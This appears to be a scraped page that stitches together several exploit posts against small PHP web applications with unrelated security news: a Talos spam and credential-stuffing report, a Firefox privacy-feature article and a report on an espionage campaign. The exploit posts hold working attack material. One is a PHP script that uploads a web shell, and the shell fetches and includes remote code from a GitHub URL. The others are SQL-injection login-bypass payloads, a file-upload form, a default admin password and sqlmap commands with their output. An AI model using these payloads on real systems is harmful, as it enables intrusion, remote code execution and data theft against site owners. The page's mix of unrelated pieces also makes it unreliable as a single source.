School Log Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : School Log Management System 1.0 code injection Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/slms/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/slms/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Log Management System 1.0 Code Injection

School Dormitory Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : School Dormitory Management System v1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/user/257130/activity                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clientsGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Dormitory Management System 1.0 Insecure Settings

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**Sample Blog Site 1.0 SQL Injection**

**Sample Blog Site 1.0 SQL Injection**

Posted Sep 26, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass

SHA-256 | ff00fa017d6b2c496a8bf995f9b728c45edba03e76532f4e55d8dac49f2ca066

Download | Favorite | View

**Sample Blog Site 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 auth by pass Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://127.0.0.1/blog/admin/index.php?page=homeGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 SQL Injection

Rupee Invoice System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Rupee Invoice System v1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.mayurik.com/                                                                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : phpinventory/php_action/createProduct.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html>  
<head>  
    <title>Create Product</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/phpinventory/php_action/createProduct.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="currnt_date" value="100">

                <label for="productImage">Product Image:</label>  
        <input type="file" name="productImage" id="productImage" required><br><br>

        <input type="submit" name="create" value="Create">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/phpinventory/assets/myimages/dab.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Rupee Invoice System 1.0 Arbitrary File Upload

Restaurant POS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Restaurant POS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/deletestaff.php?staffID=1[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] ---   GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N   sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:---  Parameter: staffID (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)---[22:32:22] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.30, Apache 2.4.58, PHPback-end DBMS: MySQL >= 5.1 (MariaDB fork)[22:32:22] [INFO] fetching database names[22:32:22] [INFO] starting 7 threads[22:32:22] [INFO] retrieved: 'bangresto'[22:32:22] [INFO] retrieved: 'cms'[22:32:22] [INFO] retrieved: 'phpmyadmin'[22:32:22] [INFO] retrieved: 'mysql'[22:32:22] [INFO] retrieved: 'test'[22:32:22] [INFO] retrieved: 'information_schema'[22:32:22] [INFO] retrieved: 'performance_schema'available databases [7]:[*] bangresto[*] ending @ 22:32:22 /2024-08-16/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Restaurant POS 1.0 SQL Injection

Responsive Binary mlm version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Responsive Binary mlm 3.2.0 Auth By PAss Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202312/kashipara.com_responsive-binary-mlm-zip.zip   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : u&p = ' or 0=0 ##[+] http://127.0.0.1/responsive_binary_mlm/admin/admin_dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Responsive Binary mlm 3.2.0 SQL Injection

Responsive Billing sw System version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Responsive Billing sw System 3.2.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202311/kashipara.com_responsive-billing-sw-zip.zip            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/responsive_billing_sw/index.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Responsive Billing sw System 3.2.0 SQL Injection

Many spammers have elected to attack web pages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited email.

Thursday, September 26, 2024 09:00

*   Attackers are abusing normal features of legitimate web sites to transmit spam, such as the traditional method of verifying the creation of a new account. 
*   This web infrastructure and its associated email infrastructure is otherwise used for legitimate purposes, which makes blocking these messages more difficult for defenders. 
*   The breadth of different sources of spam suggests that the attackers have automated the process of initially identifying web infrastructure vulnerable to abuse. However, the complexity of executing each individual attack suggests more human involvement. 
*   Attackers are also testing credentials obtained from data breaches by credential stuffing IMAP and SMTP accounts. 

Spammers are always looking for creative ways to bypass spam filters. As a spammer, one of the problems with creating your own architecture to deliver mail is that, once the spam starts flowing, these sources (IPs/domains) can be blocked. Spam can more easily find its way into the inbox if it is delivered from an unexpected or legitimate source. Realizing this, many spammers have elected to attack web pages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited email. 

There are many ways spammers accomplish this task: One is to abuse web pages connected to backend SMTP infrastructure, and another uses breached email/password credentials to try and log into email accounts they can use to send spam. Cisco Talos has new research that explores both styles of attack and delves into some of the tools used by spammers. 

**Web form abuse **

The HTML <form> tag was released with HTML version 2.0, nearly 30 years ago. Since then, spammers have found creative ways to abuse web forms. The lack of proper input validation left many of these forms open to manipulation by attackers. Over time, these HTML form attacks became more sophisticated, sometimes employing cross-site scripting or SQL injection. Many administrators learned the hard way that their forms were vulnerable and were forced to harden their forms as a result. However, spammers are a persistent bunch, and they look for anything they can use to facilitate malicious activities. Creative spammers have realized that \*any\* web form that triggers an email back to the user can be abused. 

**Online account registration **

Many websites allow users to sign up for an account and log in to access specific features or content. Typically, upon successful user registration, an email is triggered back to the user to confirm the account. In this case, the spammers have overloaded the name field with text and a link, which is unfortunately not validated or sanitized in any way. The resulting email back to the victim contains the spammer’s link. 

An example spam message exploiting an account signup form

**Event signup **

Like account registration, many websites let users register to participate in an event. Again, poor input validation and sanitization is prevalent on many of these sites, allowing the spammers to overload the name field with text and URLs. 

An example spam message exploiting an event registration form

Contact forms sometimes send users a copy of their form responses. This could be a checkbox on the form or an automatic reply. Again, the spammers rely on poor input validation and sanitization to transmit text and URLs to the victim. 

An example spam message exploiting a web site contact form

**Google Quizzes, Calendar, Groups and other apps **

Talos previously reported on spammers abusing Google Quizzes. But that is not the only Google software that spammers have been abusing. Google Drawings, Sheets, Forms, Calendar and Groups all contain similar vulnerabilities that allow spammers to send unsolicited emails to victims. Additionally, by using a variety of Google applications, and ones that are located in different countries, they can largely avoid detection by Google. 

These messages from Google require some significant pre-attack setup. For example, to send spam from Google Quizzes, the attackers must set up a quiz and configure it correctly, then they must fill out the quiz, masquerading as the victim. Then, the attackers must log back into the Google Quiz they created to “grade” the results and send the quiz score email back to the victim. This suggests a significant human interaction on the part of the spammers. 

An example spam message sent via Google Drawings

An example spam message sent via Google Sheets

An example spam message sent via Google Forms

An example spam message sent via Google Calendar

An example spam message sent via Google Groups

Unfortunately for defenders, there is very little we can do to defend against such spam messages. Most of the emails sent by these contact forms are legitimate, so the malicious email blends in with the otherwise legitimate traffic. However, on the positive side, some of the extra content in the emails gives away that the message is not legitimate.   

**SMTP server credential stuffing **

Have you ever wondered what cyber criminals do with all the information they’ve obtained in a data breach? If the stolen dataset contains email address usernames and passwords, then it is quite probable that those same credentials will work in other places. Trying the same set of credentials at other sites is known as “credential stuffing.”  

One of the main ways cybercriminals leverage stolen credentials is attempting to access the victim’s email. POP/IMAP servers are often juicy targets, because if an attacker can access a person’s email inbox, then they can find other accounts used by the victim, account usernames/passwords, cryptocurrency wallet keys or perhaps other lucrative, sensitive personal information. Attackers can also leverage access to the victim’s inbox to receive email-based multifactor authentication codes or password resets. 

One of the other, lesser-known ways attackers leverage stolen credentials is on the outbound side of the victim’s mailbox. If an attacker can log into the outbound smtp server as the victim, they can send out email using the victim’s email server. This provides the cybercriminal with a legitimate mail server and domain which are not likely blocked by various spam real-time blackhole lists (RBLs). 

How do cybercriminals locate mailboxes that have working credentials? Typically, the attacker will set up a personal mailbox somewhere (Yahoo, Gmail, etc.) and then send themselves test messages using the stolen credentials at the outbound SMTP server matching the email address’ domain. Some criminals have turned this into an online business by finding working SMTP server credentials and selling them to others. 

__A test email from Smart Tools Shop. The price of working SMTP server credentials is $6__

__The Smart Tools Shop interface shows the typical prices of SMTP server credentials__ 

There are also open-source tools used for these sorts of activities. Among the tools Talos sees most frequently are MadCat and MailRip, both of which are available to download and run on GitHub. 

The MadCat SMTP cracker tool found on Github

 MadCat is an open-source SMTP tool that includes credential-stuffing capabilities. The test emails can be recognized from the Subject header: “Subject: You get a new smtp”. Among some of MadCat’s advertised features is the ability to skip emails hosted by known security vendors such as Cisco. This feature is implemented rather poorly, however, because the code used to skip “dangerous emails” is simply a regular expression with words like “cisco,” “cloudflare,” “proofpoint,” etc., as if spam traps implemented by security organizations are all run out of the main corporate domain name (S_poiler alert: they are not_). 

__MailRip is another open-source tool capable of credential stuffing in outbound SMTP servers__

Another tool that Talos frequently sees performing credential stuffing is a program named MailRip. Although it contains a disclaimer that the code is not to be used “for any kind of illegal activity,” it is a tool primarily designed to facilitate checking username/password combos on IMAP servers and outbound SMTP servers. 

Besides these commercial and open-source tools, Talos also sees attackers who have “rolled their own” tools used for this activity. Typically, the Subject headers are a giveaway that the messages are test emails looking for valid SMTP accounts. However, some of the subject headers and email bodies of test messages are encoded/encrypted. Below are some of the more frequent Subject headers Talos has encountered. 

**Common Credential Stuffing Test Message Subject headers:**   
Subject: Mail Inbox Test IDF50F22   
Subject: You get a new smtp **_(from MadCat SMTP cracker tool)_**   
Subject: smtp id 2496130   
Subject: g1ukczr0iz3b6o6xsk0al0tyqy8ggr **_(encrypted/encoded Subject/Body)_**   
Subject: test   
Subject: Testing: mx.example.com   
Subject: new SMTP from MadCat checker   
Subject: Smart Tools Shop - Test SMTP ID: 1016587   
Subject: MailRip Test Result ID0BAB7A **_(from MailRip Tool)_**   
Subject: !XProad mx.example.com|2525|nywepaq@example.com|f29r21caT4. **_(from Laravel Monster Tool)_**   
Subject: SMTP Check #131085 - Jemex Shop   
Subject: TESTING RELAY!   
Subject: SMTP Check #6148 - Spyxe Shop   
Subject: Your Account ID #62363   
Subject: Mail Test Result ID0CD637.    
Subject: aloha: 127.0.0.255   
Subject: Mail Auto-Email ID86E8A6   
Subject: Mail Email Test ID23CB4D   
Subject: Mail Test Result IDD762AB   
Subject: =?utf-8?q?New\_working\_smtp\_=2350131001?=  

**Thwarting SMTP server credential stuffers **

One way Talos has tried to thwart these types of attacks is to make them believe that the actors have found a working outbound email account.  

To accomplish this, Talos has configured some of our spam traps to deliver those messages we have identified by Subject as test messages from the credential stuffers, while every other email is sent to various internal anti-spam systems for processing. Once the credential stuffers believe they have found a valid account, they typically turn on the spam firehose, which causes all the connecting IP addresses to be dinged for sending spam, which significantly affects those addresses' ability to deliver mail to the inbox. 

 The anti-spam industry has largely been successful at driving a wedge between legitimate senders and spammers, causing spammers to seek out new ways to deliver their mail.  

Rather than send directly, these spammers have chosen to try and blend in with legitimate traffic to make their spam more difficult to block.  

**Defenses **

**_Create Unique Passwords:_** People are terrible at creating and remembering good passwords. For the past several decades, even, the most popular unsafe password has been “123456”. Despite years of guidance from the security community that people should use a unique password for every website, many users will re-use the same credentials at several different sites. When someone is using unique credentials everywhere, one single compromised account will not impact any other online accounts belonging to that victim.  

**Use a password manager:** All those unique passwords you have been creating are going to be hard to remember. But avoid storing credentials in a browser. These can be stolen by attackers quite easily. A perfect tool exists for storing your passwords: a password manager. It is best to use a dedicated password manger such as KeePass, LastPass or 1Password. 

**Educate Users:** Unfortunately for defenders, there is very little we can do to defend against spam messages sent from legitimate forms. Most of the emails sent via forms are legitimate, so the malicious email blends in with the otherwise legitimate email traffic. However, on the positive side, some of the extra content in the emails gives away that the message is not legitimate. Educating your users to be wary of such email messages is a good way to prevent them from falling victim to phishing and other attacks that arrive by email.

Simple Mail Transfer Pirates:   How threat actors are abusing third-party infrastructure to send spam

Mozilla has introduced a feature called Privacy Preserving Attribution and turned it on by default, much to the chagrin of a privacy watchdog.

A European privacy watchdog has filed a complaint against Mozilla for quietly enabling Privacy Preserving Attribution (PPA) in its Firefox browser.

Noyb (none of your business) argues that despite its reassuring name, the feature allows the browser to track your online behavior. By design, Privacy Preserving attribution shifts the tracking from the websites to the browser.

With this shift it seems that Mozilla is following Google’s example. Google is focusing on Privacy Sandbox to replace the despised third party tracking cookies. This also puts the browser (Chrome and Chromium based) in charge of the tracking.

The problem noyb has with PPA is not so much the tracking which is less invasive than what we are used to, but the fact that it was introduced without giving users a chance to think about it. Mozilla simply turned it on by default after a recent update, which noyb says is disappointing coming from a company that is supposed to be privacy friendly.

And, even though the Firefox PPA offers more privacy than third-party cookies, noyb says this move means that Mozilla is caving in to advertisers.

Felix Mikolasch, data protection lawyer at noyb, said:

> “Mozilla has just bought into the narrative that the advertising industry has a right to track users by turning Firefox into an ad measurement tool.”

Mozilla says that PPA allows advertisers to measure the effectiveness of their advertising without compromising the user’s privacy. Admittedly the user’s benefit indirectly, as the sites they visit are often supported by advertising. Making advertising better also makes it possible for more sites to function using the support that advertising provides.

The costs of getting rid of third-party cookies by using PPA are small, Mozilla says:

*   CPU, network, and battery costs for generating and submitting reports. Here, this cost is negligible, particularly relative to what sites are already able to use. This design could replace some of those costs, which might lead to improvements in some cases.
*   Privacy loss from use of their information. Attribution information will be aggregated and will include noise that protects the contribution that each person makes. This design is structured so that advertisers learn about what many people do as a group, not what any single person does.

If this is the price we must pay to get rid of third-party cookies and some degree of targeted advertising, is that worth it to you? Let us know in the comments.

Noyb has asked the Austrian data protection authority (DSB) to investigate Mozilla’s behavior. They say Mozilla should properly inform everyone about Firefox’s data processing activities and effectively switch to an opt-in system, as well as delete all unlawfully processed data.

**How can I disable PPA?**

If you want to disable PPA, this is what you need to do:

1.  Click the menu button and select **Settings**.
2.  In the **Privacy & Security** panel, find the **Website Advertising Preferences** section.
3.  Uncheck the box labeled **Allow websites to perform privacy-preserving ad measurement**.

**Protection, in the browser**

Malwarebytes’ free Browser Guard extension can help you block ads and other unwanted content in Firefox.

 Privacy watchdog files complaint over Firefox quietly enabling its Privacy Preserving Attribution 

An advanced threat actor with an India nexus has been observed using multiple cloud service providers to facilitate credential harvesting, malware delivery, and command-and-control (C2).
Web infrastructure and security company Cloudflare is tracking the activity under the name SloppyLemming, which is also called Outrider Tiger and Fishing Elephant.
"Between late 2022 to present, SloppyLemming

Cloud Security / Cyber Espionage

An advanced threat actor with an India nexus has been observed using multiple cloud service providers to facilitate credential harvesting, malware delivery, and command-and-control (C2).

Web infrastructure and security company Cloudflare is tracking the activity under the name **SloppyLemming**, which is also called Outrider Tiger and Fishing Elephant.

"Between late 2022 to present, SloppyLemming has routinely used Cloudflare Workers, likely as part of a broad espionage campaign targeting South and East Asian countries," Cloudflare said in an analysis.

SloppyLemming is assessed to be active since at least July 2021, with prior campaigns leveraging malware such as Ares RAT and WarHawk, the latter of which is also linked to a known hacking crew called SideWinder. The use of Ares RAT, on the other hand, has been linked to SideCopy, a threat actor likely of Pakistani origin.

Targets of the SloppyLemming's activity span government, law enforcement, energy, education, telecommunications, and technology entities located in Pakistan, Sri Lanka, Bangladesh, China, Nepal, and Indonesia.

The attack chains involve sending spear-phishing emails to targets that aim to trick recipients into clicking on a malicious link by inducing a false sense of urgency, claiming that they need to complete a mandatory process within the next 24 hours.

Clicking on the URL takes the victim to a credential harvesting page, which then serves as a mechanism for the threat actor to gain unauthorized access to targeted email accounts within organizations that are of interest.

"The actor uses a custom-built tool named CloudPhish to create a malicious Cloudflare Worker to handle the credential logging logic and exfiltration of victim credentials to the threat actor," the company said.

Some of the attacks undertaken by SloppyLemming have leveraged similar techniques to capture Google OAuth tokens, as well as employ booby-trapped RAR archives ("CamScanner 06-10-2024 15.29.rar") that likely exploit a WinRAR flaw (CVE-2023-38831) to achieve remote code execution.

Present within the RAR file is an executable that, besides displaying the decoy document, stealthily loads "CRYPTSP.dll," which serves as a downloader to retrieve a remote access trojan hosted on Dropbox.

It's worth mentioning here that cybersecurity company SEQRITE detailed an analogous campaign undertaken by the SideCopy actors last year targeting Indian government and defense sectors to distribute the Ares RAT using ZIP archives named "DocScanner\_AUG\_2023.zip" and "DocScanner-Oct.zip" that are engineered to trigger the same vulnerability.

A third infection sequence employed by SloppyLemming entails using spear-phishing lures to lead prospective targets to a phony website that impersonates the Punjab Information Technology Board (PITB) in Pakistan, after which they are redirected to another site that contains an internet shortcut (URL) file.

The URL file comes embedded with code to download another file, an executable named PITB-JR5124.exe, from the same server. The binary is a legitimate file that's used to sideload a rogue DLL named profapi.dll that subsequently communicates with a Cloudflare Worker.

These Cloudflare Worker URLs, the company noted, act as an intermediary, relaying requests to the actual C2 domain used by the adversary ("aljazeerak\[.\]online").

Cloudflare said it "observed concerted efforts by SloppyLemming to target Pakistani police departments and other law enforcement organizations," adding "there are indications that the actor has targeted entities involved in the operation and maintenance of Pakistan's sole nuclear power facility."

Some of the other targets of credential harvesting activity encompass Sri Lankan and Bangladeshi government and military organizations, and to a lesser extent, Chinese energy and academic sector entities.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google